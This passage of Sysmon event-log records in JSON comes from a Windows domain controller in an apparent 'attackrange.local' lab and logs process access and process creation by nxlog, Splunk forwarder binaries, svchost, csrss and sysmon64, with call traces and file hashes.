Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6253,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.533\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.533","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6254,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.612\r\nProcessGuid: {E2A3D6B1-1200-5F25-0000-0010BA200900}\r\nProcessId: 4892\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.612","ProcessGuid":"{E2A3D6B1-1200-5F25-0000-0010BA200900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6255,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.612\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1200-5F25-0000-0010BA200900}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.612","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1200-5F25-0000-0010BA200900}","TargetProcessId":"4892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6256,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.612\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1200-5F25-0000-0010BA200900}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.612","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1200-5F25-0000-0010BA200900}","TargetProcessId":"4892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6257,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.612\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.612","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6258,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.612\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.612","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6259,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.612\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.612","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6260,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:00.612\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:00.612","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
